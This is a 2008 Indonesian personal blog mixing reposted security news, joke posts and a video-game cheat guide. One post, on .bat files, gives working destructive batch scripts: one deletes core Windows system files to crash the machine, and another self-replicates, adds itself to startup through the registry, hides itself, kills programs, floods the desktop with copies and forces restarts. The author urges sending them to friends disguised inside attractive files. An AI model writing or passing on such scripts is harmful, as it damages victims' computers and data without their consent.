Wajah Baru Virus Arp Spoorfing

JAKARTA – Beberapa bulan lalu dunia komputer selesai dikejutkan dengan Virus Agent.FUVR atau yang dikenal dengan arp spoorfing, virus yang menghebohkan para pengguna internet, terutama bagi yang doyan ber-YM-an. Virus ini menyerang dengan cepat, bukan hanya pengguna biasa yang kelimpungan, perusahaan yang tidak memiliki team perlindungan antivirus yang berpengalamaan juga ketar-ketir.

Belum juga virus Agent.FUVR ini tuntas diselesaikan, virus ini lahir dengan jilid II, bahkan kemampuan dalam menjalakan aksinya 2 kali lebih hebat dari pendahulunya, karena cara kerjanya yang lebih baik dari Arp spoofing sebelumnya.

Virus Arp spoofing jilid II ini memiliki ciri khas dalam penyebarannya, dimana file yang terkena akan menampilkan file bernama Gameeeeeee.vbs, dan Gameeeeeee.pif (kedua-duanya memang menggunakan file ?game? dengan huruf ?e? sebanyak tujuh buah).

Seperti biasa, pada awalnya virus ini menggunakan nama MicroSoft, seperti Microsoft.bat, Microsft.vbs, atau Microsoft.pif, yang berlokasi pada drive C:/. Pada tahapan ini, virus menggunakan file ThunderAdvise.dll. Dan sebagai media update, mereka menggunakan internet dan Jview.dll.

Selanjutnya, dengan file ThunderAdvise.dll di C:WINDOWSDownloaded Program Files, virus ini melancarkan aksinya dengan menggunakan wmsetup.dll dan QQ_Update.cab yang berlokasi pada drive C:WINDOWSAppPatch, internet serta DesktopWin.dll sebagai alat untuk penyebarluasan.

Pada tahapan yang terakhir inilah virus ini menggunakan file yang bernama Gameeeeeee.vbs, dan Gameeeeeee.pif yang berlokasi pada C:Documents dan SettingsuserLocal SettingsTemporary Internet Files, serta HBKernel32.sys lokasi pada C:WINDOWS/system32/drivers.

Korban dari virus ini jauh lebih beragam yang utama terutama internet. Pada saat anda melakukan koneksi Yahoo Messenger akan muncul script error. Selain itu script juga menyerang pada browser yang sengaja ditambahkan pada halaman website yang diakses. Kecerdikan virus ini terlihat saat berhasil memalsukan Mac Address Gateway dan menjadikan transparent proxy bagi gateway. Sehingga saat mengakses internet akan dengan mudah disisipkan link tambahan pada setiap aksesnya. Seluruh browser mulai dari Internet Explorer, sampai Opera menjadi sasaran empuk.

Karena sisipan ilegal tadi, secara tidak sadar pengguna internet akan mengunduh dan menjalankan virus secara otomotis. Hasil unduhan itu berupa 2 file utama yaitu gameeeeeee.vbs dan gameeeeeee.pif. Setelah itu mereka akan menyebar melalui file ThunderAdvise.dll. (srn)

Sumber : okezone.com

November 23, 2008 at 5:02 pm Leave a comment

Minal ‘Aidin Walfaidzin

ketupat lebaran

ketupat lebaran

Bagai sebuah “SYSTEM” yang dipenuhi “BUG“, diri ini dapat dengan mudah di “EXPLOIT“-tasi.
Jaga hati, ucapan, dan sikap dengan “FIREWALL” keimanan.
SCAN” dan “REMOVE” semua “VIRUS” dan “BACKDOR” yang masih tersisa.
END PROCESS” pikiran kotor yang masih ada.
TAR -ZXVF” semua keluh kesah hanya pada-Nya semata.
SAVE MODE” dalam sikap dan perkataan.
GOOGLE“, temukan jati diri sesungguhnya.
Hari kemenangan tlah tiba, saatnya kita ber-“YAHOO!” ria.

MINAL ‘AIDIN WAL-FAIZIN, MOHON MAAF LAHIR DAN BATIN

September 29, 2008 at 1:44 pm Leave a comment

Alamat IP Akan Habis pada 2010

LONDON – Vinton Gray “Vint” Cerf yang dijuluki sebagai ‘ayah-nya internet’, mengingatkan para ilmuwan bahwa dunia sudah di ambang kehabisan alamat internet.

Bila hal itu benar terjadi, diramalkan komputer tidak akan bisa lagi saling mengidentifikasi satu sama lain dan saling berkomunikasi.

Cerf yang merupakan ilmuwan terkemuka dari bidang komputer menyatakan, dunia bisnis dan konsumen membutuhkan sesegera mungkin pergantian alamat internet.

Sebagai informasi, setiap komputer dan peranti online didesain dengan masing-masing dipasangkan alamat Internet Protocol (IP) yang unik.

Menurut perkiraan persediaan nomor yang belum teralokasi akan segera habis dalam dua tahun ke depan. Padahal alamat IP merupakan hal yang sangat krusial untuk sebuah situs dan akan berimbas langsung ke dunia bisnis. Bila diandaikan, alamat IP adalah seperti alamat rumah.

Menanggapi kondisi ini, Cerf menegaskan bahwa inilah saatnya untuk mulai bersiap-siap, terutama bagi penyedia layanan internet. Jika tidak, komputer tidak akan bisa dipakai berselancar online lagi dan selanjutnya konektivitas internet akan musnah. Cerf juga menambahkan bahwa tidak akan sempat lagi bila memilih jalan transisi secara pelan-pelan.

“Kondisi ini seperti internet yang akan kehabisan nomor telepon, padahal tanpa nomor telepon baru itu berarti tidak ada lagi pertambahan pelanggan internet,” terang Cerf seperti dilansir Big News Network, Jumat (26/9/2008).

Cerf dan para koleganya menemukan sistem internet pada 1977 dan mereka menempatkan Internet Protocol version Four (Ipv4) dengan kapasitas 4,2 miliar alamat. Masing-masing IPv4 berseri 32 digit angka biner.

Menganut estimasi ketersediaan alamat IPv4 yang tersisa tinggal 14 persen, diprediksikan alamat tersebut akan habis di tahun 2010, dan mungkin juga akan lebih cepat di tahun depan, mengingat berkembangnya teknologi yang berkemampuan online, terutama ponsel mobile.

Untuk menenangkan suasana, beberapa ilmuwan mengklaim sudah mengembangkan sistem baru bertitel IPv6 yang dijanjikan sudah siap digunakan untuk sepuluh tahun ke depan. Tiap IPv6 mengandung 128 bit dan bisa menyediakan bertriliun-triliun alamat yang diyakini bisa memenuhi kebutuhan manusia generasi mendatang terhadap internet.

Kedua sistem protokol tersebut akan berjalan bersamaan dengan jaminan alamat berbasis IPv4 masih bisa digunakan. Namun bila IPv6 tidak diaplikasikan secara luas, maka mereka yang menggunakan IPv6 tidak bisa tersambung ke internet secara keseluruhan.

Krisis alamat protokol internet ini ditanggapi serius pula oleh The Organisation for Economic Co-operation and Development. Organisasi ini mewanta wanti pergantian pola alamat internet yang bisa jadi merupakan masa depan kritis bagi perekonomian internet karena bidang bisnis apapun pasti membutuhkan alamat IP untuk perkembangan bisnis yang bersangkutan. (jri)

Sumber

KYAAAAAAA…!!!! ternyata sudah secepat itu

Buat para admin jaringan persiapkan otak anda buat ngitung IPv6 yang 128 Bit itu,, hueheue…

September 27, 2008 at 5:37 pm Leave a comment

Re: Surat Cinta Sorang Hacker

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

Sumber : http://echo.or.id/forum/viewtopic.php?p=43382

Kasian sang hacker,, akhirnya setelah sekian lama sang hacker pun mendapatkan jawaban surat cinta nya,,

Maaf, aku tak pernah menggunakan port default. Dan aku slalu menggunakan protocol2 yang secure.
sehingga tak kan pernah kau mendapatkan plain text saat kau mencoba melakukan sniffing terhadapku
dan C:\nc -l -o -v -e yang kau berikan hanya kuanggap sebagai spam semata
Meskipun kau menggunakan anonymous proxy, kan terus ku trace, hingga ku temukan IP asli mu sebagai seorang pecundang yang tak bisa di andalkan

Maaf, bug-bug vulnerabilitasku yang kau temukan hanyalah sebuah honeypot untuk menjebak pecundang sepertimu.
Antivirus ku telah mendetect dan meRemove mu sebagai sebuah trojan yang mengancam
Meskipun kau berhasil memasang backdor php shell di hatiku tapi maaf,.. server tomcat ku hanya support jsp. 😛
Freespace yang ada hanya tinggal sebuah drive swap yang sangat penting artinya bagiku, dan takkan kuijinkan siapapun menempatinya.
Meskipun kau berhasil menambatkan Netcat sebagai “Remote Connect-Back Shell”, percuma,.. proxy bokap ku takkan pernah mengijinkan ku terkoneksi dg orang lain.

Maaf, untuk saat ini kau hanya akan menerima “Request timed out” dariku.
Karena hatiku sedang “Sory, server maintenance”
Tak perlu kau menjaga ku, karna bokapku telah menjodohkanku dengan seorang PNS (bukan Pegawai Negeri Sipil tapi Professional Network Security)

Maaf, untuk saat ini “Destination unreachable”
Untukmu tak prnah ada kata “You dont have permission to access it”
Suatu saat kau akan menerima “Reply from me” dengan TTL=never. Tapi hanya sebatas sahabat, jangan mengharap respon lebih dariku.
karena adminku bisa-bisa curigation dan memblok akses dengan alasan klasik RUU APP.

Kau benar, aku bukanlah sebuah system, dan aku bukanlah bidadarimu.
dan aku bukanlah Ryan Si penjagal dari jombang yang bisa kau ajak berhomo ria.

Sumber :

http://coder.web.id/forum/index.php?topic=143.msg18402#msg18402

Huahahuahuahua….. konyoll

September 27, 2008 at 5:22 pm Leave a comment

Dari iseng sampai serius dengan file *.bat

Buat yang lagi bosan, suka iseng, resek, jail, dan kurang kerjaan mungkin ngerjain teman bisa menjadi alternatif untuk mengisi waktu anda yang membosankan itu (dasar sampah !!). Mari iseng2 dulu dengan file *.bat ini,, yuuk marii,,

@echo off
A:
Echo Do you want to delete all your computer’s data? (y/n)
pause
Echo Are you sure want to delete all data? (y/n)
pause
Echo Deleting all data…
pause
dir /s
pause Echo Hahaha,, kennaaak deeeh..
pause
goto A

Copy code ke notepad, simpan file trsebut dengan nama <apaaja>.bat kirim ke teman anda ato simpan di start up kompi nya,, lebih elit lagi klo dibinder ama file-file yg menarik. Jika file ini diklik maka akan menampilkan pesan untuk konfirmasi penghapusan semua data, tapi sebenarnya enggak cuma discan aja koq,,

Berikutnya coba yang satu ini

@echo off
start planx

Simpan dengan nama planx.bat. Haha,, yang ini lebih parah lagi temen anda pasti bakal kelabakan, dua baris code diatas akan menampilkan box prompt secara terus menerus sampe akhirnya box yg paling akhir keluar di close. Coba aja sendiri,, heheh.. gpp kok

Bosen dengan main-main mulu? mari mulai serius. Simpan code dibawah ini dengan nama <apaaja>.bat

@echo off
del c:\\windows\system32\shutdown.exe
del c:\\windows\system32\winlogon.exe
del c:\\windows\system32\rundll32.exe

Ihh.. yang ini serem banget, liat aja tuh. Shutdown.exe, winlogon.exe rundll32.exe di apus bersih, crash deh komputer nya,,

Nah,, yang satu ini gak kalah berbahayanya nih,,

@echo off
color4
title PLX
start
start
start
start calc
copy %0 %systemroot%\Picture2.bat > null
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Picture2 /t REG_SZ /d %systemroot%\Picture2.bat /f > null
copy %0 *.bat > null
Attrib +r +h Picture2.bat
Attrib +r +h
RUNDLL32USER32.DLL,SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%desktop
copy Picture2.bat PLX.bat
copy Picture2.bat PLX.jpg
copy Picture2.bat PLX.txt
copy Picture2.bat PLX.exe
copy Picture2.bat RIP.mov
copy Picture2.bat FixVirus.bat
cd %userprofile%\My Documents
copy Picture2.bat PLX1.bat
copy Picture2.bat PLX.jpg
copy Picture2.bat PLX txt
copy Picture2.bat PLX.exe
copy Picture2.bat PLX.mov
copy Picture2.bat FixVirus1.bat
start
start calc
cls
msg*PLX
msg*PLX
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:PLX
cd %userprofile%\desktop
copy Picture2.bat %random%.bat
cd %userprofile%\My Documents
copy Picture2.bat %random%.bat
goto PLX

Simpan code diatas dari notepad dengan nama Picture2.bat. File ini akan membuka windows, mengcopy dirinya di start up dengan 2 metode, menjadikan dirinya bertipe “hidden”, mengganti tombol mouse kiri dengan kanan, begitu juga sebaliknya, mematikan limeware, msn, norton, mencopy dirinya di desktop dan documents, membuka alert box dan dan akhirnya merestart komputer anda. Kalo pengen nyobain jangan ragu-ragu untuk mengklik nya,, dan rasakan faedah nya,, heuheuehue,,,

Agar tampak lebih meyakinkan compile menjadi file exe lalu bind dengan file menarik lainnya ato dengan cara lain memanfaatkan SFX winrar (mungkin lain kali akan dibahas, udah malem besok masuk pagi,, arrrr). Wahh,, tanduk setan anda sudah keluar tuh,, keliatannya pengen banget ngerjain temen ato mungkin balas dendam ama musuh… hanya berpesan seperti kata nenek saya “ingat jangan merusak komputer orang,, iseng boleeh,,…”

PL4nX – Out

September 9, 2008 at 6:03 pm 1 comment

Google Blokir Ziddu.com???

8 Sepetember 08 pukul 2.30 dini hari

Cukup kaget ketika mengarahkan link menuju ziddu.com muncul warning dari google dengan screenshot seperti ini

google warning for ziddu.com
google warning for ziddu.com

Google menganggap ziddu.com sebagai situs yang berusaha menginstal program jahat ke komputer pengunjung. Berikut statement yang dikeluarkan google atas situs ini

What is the current listing status for http://www.ziddu.com/?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 216 pages we tested on the site over the past 90 days, 54 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 09/07/2008, and the last time suspicious content was found on this site was on 09/07/2008.

Malicious software is hosted on 1 domain(s), including adxcnet.net.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including adecn.com, adrefer.net.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, http://www.ziddu.com/ did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

Namun peringatan ini hanya terjadi pada client google, seperti pengguna browser mozilla, pada browser lain seperti IE, situs tersebut tidak mengeluarkan warning apapun..

Ziddu.com merupakan situs file hosting yang cukup digemari hoster, situs ini menerapkan pemberian fee kepada membernya bagi setiap file yang didownload melalui situsnya. Yang menarik situs ini tidak meminta biaya sedikit pun bagi calon member yang ingin bergabung, Upload – Share – Earn Money 100% FREE!!

So,, bagaimana nasib para penanam saham di ziddu ?? ternyata beberapa membernya murka,, lihat pernyataan membernya yang satu ini

So,How about My Earning????(…………???)
How about My Files?????(………..????)
Would you(ziddu.com) was responsible with that( my files n my earning$$$$$)

sumber

Untung gak ada file-file penting saya di situ,, hehe.. Yang penting selalu siaga aja, rajin-rajin aja deh patch anti-virus, n firewall dengan update-an terbaru.

PL4nX – Out

September 8, 2008 at 7:02 pm Leave a comment

Hacking via Microprocessor

SAN FRANCISCO – Selama beberapa tahun terakhir para hackers melakukan serangan dengan memanfaatkan bug dari sebuah perangkat lunak ataupun sistem operasi. Namun para periset dari University of Illinois di Urbana-Champaign menunjukan bagaimana mereka melakukan serangan pada chip microprocessor. Demontrasi serangan ini dilakukan di hadapan para peserta the Usenix Workshop on Large-Scale Exploits and Emergent Threats.

Konferensi yang digelar di San Francisco ini menunjukkan era baru bahwa serangan hacker dipastikan akan semakin meluas jika mereka mampu melakukan hacking terhadap microprocessor. Dalam paparannya yang dilansir InfoWorld, Senin (21/4/2008), tim menggunakan sebuah prosessor yang diprogram khusus yang berjalan di sistem operasi Linux.

Samuel King, yang merupakan asisten profesor di University of Illnois, mengatakan mereka mengubah 1341 logic gate dari 1 juta gate yang ada. “Ini seperti sebuah serangan back door,” ujarnya memastikan bahwa tim tidak memanfaatkan bug perangkat lunak untuk melakukan eksplotasi. “Dari perspektif perangkat lunak, paket akan dibuang dan kami mampu memanfaatkan situasi ini,” jelas King.

Setelah sukses meluncurkan serangan ke microprosessor maka riset berikutnya yang akan dilakukan adalah membuat sebuah tool yang bisa mendeteksi ancaman seperti ini. Pasalnya jika serangan ini dilakukan pada microprosessor maka akan sulit bagi sebuah aplikasi security untuk mendeteksi

Sumber : okezone.com

September 7, 2008 at 5:04 pm Leave a comment

Maen Curang Hacker Evelution

Hacker Evolution, satu lagi game yang di peruntukkan bagi mereka yang tertarik memperdalam ilmu di bidang seni hacking, cracking, ataupun security networking. Hacker Evolution dapat di download disini http://download381.mediafire.com/../_Evolution_…rar

Dengan memanfaatkan sebaik mungkin sources yang ada kita dituntut untuk menyelesaikan misi yang sudah ditentukan, misalnya menyusup ke server suatu perusahaan, mencuri uang dengan membobol bank, mencuri data, menghapus trojan, dan lain-lain. Dengan mencuri uang dengan membobol atm kita bisa menambah “money” kita yang dapat dipergunakan untuk meng-upgrade komputer standar kita dan juga dapat digunakan untuk menghapus jejak “trace”. Semakin tinggi spesifikasi komputer maka semakin mudah untuk menyelesaikan misi. Apa bila berhasil menyelesaikan misi maka score pun kan terus bertambah dan berhak melnjutkan ke misi level selanjutnya yang tentu nya lebih sulit lagi. Command-command yang digunakan mirip dengan command dasar inux tapi tidak sama persis loh, namanya juga game. Cari aja review lengkap nya di google

Setelah saya coba game ini, ternyata gampang banget, soal nya level tutorial (udah ada petunjuk nya) tinggal ikutin aja perintah nya..hehehe.. Trus lanjut level pertama wah lumayan susah, tapi akhirnya selesai juga, ketagihan neh, lanjut level kedua..waaaahh.. sukses… hajar terus level ketiga..zzZzz..Zzz.. arrr… nyeraaahh deh..

Putar otak sana-sini jungkir balik sana-sini, tapi aahhh.. kena trace mulu.. apa mau di kata, emang bukan bakat sih jadi security profesional..

Sedikit otak curang terlintas nih.. kali aja di program file nya ada yang bisa di obok-obok, akhirnya ketemu juga deh..

Data-data setiap level disimpan dalam satu folder, misal nya level 3 memiliki data di C:\Program Files\Hacker Evolution\hemod-hackerevolution\he-level-3, nah keliatan kan folder-folder host-host yang ada. Host-host nya uda ketahuan tuh.. tapi bukan cuma itu aja, kita bisa membuka host-host yang diproteksi password, menghilangkan enkripsi, bahkan merubah nilai money yang dimiliki host-host yang ada.

Pada setiap folder level terdapat folder-folder host, dan di setiap folder host terdapat file info dan services, file info dan services ini lah yang dapat kita manipulasi. Buka file info dengan notepad yang pada folder host sec.interlink.net di folder level 3 (he-level-3) , maka kita akan melihat

560 90
3000
128

  • 560 90 adalah titik koordinat lokasi host pada map
  • 3000 adalah money yang terdapat pada host tsb, ganti sesuka hati.
  • 128 adalah encryption key yang melindungi host tsb 128 = 128 bits. Ganti dengan 0 untuk menghilangkan enkripsi nya
pada file services

4
80 httpd rn04
150 sec.interlink.net(authorize) twde3546mfrg
151 kernel_services rn08
152 management_services rn12

  • 4 adalah jumlah port yang digunakan host
  • 80 menunjukkan port 80, menggunakan service httpd dengan rn04 atau 4 karakter password, ganti rn04 dengan none maka proteksi password akan hilang.
  • Begitu juga port-port selanjut nya…

Setelah game di restart… WAW.. segala proteksi pada host-host yang sebelum nya ada jadi hilang, gak perlu lagi takut kena trace, karena setiap host bisa di jebol dengan mudah nya.. Entah kenapa developer game ini tidak mengenkripsi kode-kode program nya, akhirnya game nya mudah di manipulasi dengan mudah.. mungkin aja adalah inti game ini dibuat, soal nya game ini mustahil banget bisa selesai kalo gak di akalin (emang saya nya aja yg males mikir). Tapi kembali ke hati nurani masing-masing, lebih menarik mana, nge-game hacking?? ato nge-hacking game?? apa menariknya maen game ini kalo udah kaya gini ??

sebelum: host-host masih terproteksi
setelah : host-host unprotected

September 7, 2008 at 4:39 pm 1 comment

Hello world!

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!

September 7, 2008 at 3:13 pm 1 comment

Pages